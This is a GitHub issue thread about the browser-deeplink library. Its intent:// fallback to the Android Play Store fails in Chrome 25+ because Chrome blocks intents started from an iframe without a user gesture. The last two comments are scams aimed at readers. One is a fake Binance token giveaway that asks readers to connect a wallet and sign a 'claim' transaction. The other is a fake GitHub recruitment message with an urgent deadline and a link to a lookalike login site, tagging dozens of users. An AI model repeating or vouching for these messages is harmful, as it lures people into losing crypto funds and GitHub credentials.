### ISSUE TITLE
Chrome 25+ does not works with iFrame

### ISSUE THREAD

**Issue by 66Ton99** [hampusohlsson/browser-deeplink#3]
This is doc https://developer.chrome.com/multidevice/android/intents

**Comment by hampusohlsson** [comment]
Have you experienced any issues with this? The plugin is using `intent://` for Android browsers (except Firefox)

**Comment by 66Ton99** [comment]
no, if it is done in <A> tag, but this lib does it with <IFRAME> tag https://github.com/hampusohlsson/browser-deeplink/blob/master/browser-deeplink.js#L188-L197 and it  does not work.

**Comment by DeepakPant** [comment]
Fallback to android store  is not working in chrome for android in my case.

**Comment by cdressler** [comment]
I'm having the same issue here, the fallback to Google Play store isn't working on Android. It works fine for iOS devices.

**Comment by nelz9999** [comment]
From the post: https://paul.kinlan.me/deep-app-linking-on-android-and-chrome/, I think it may be a timing issue: "An synthetic link click within 1 second to an ```intent:``` URL will resolve the intent."

**Comment by primax79** [comment]
Chrome needs now a user gesture, I think that it cannot work in a frame

extract from Chrome doc

https://developer.chrome.com/multidevice/android/intents

Chrome doesn’t launch an external app for a given Intent URI in the following cases:
    When the Intent URI is redirected from a typed in URL.
    When the Intent URI is initiated without user gesture.

**Comment by diegobill** [comment]
Same problem! :+1:

**Comment by IT-Immanent** [comment]
# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

<a href="https://www.bnbrewards.online/?source=github" target="_blank">
  <img src="https://i.imgur.com/1yUfzqb.png" alt="Binance Free Tokens" width="400px" height="450px">
</a>


## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - 
2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

**Comment by Hamza-Ali0237** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
aakarsh, @sarangab, @ander7en, @Janderson, @svskaushik, @aannasw, @yobgurd, @kadereub, @johnpatrickroach, @chunsj, @wengbenjue, @Anita-tech, @gwcooper, @chjq201410695, @debaonline4u, @lorrenlml, @alexbrx, @ds-dian-song, @thomasrenn37, @dhruvi31
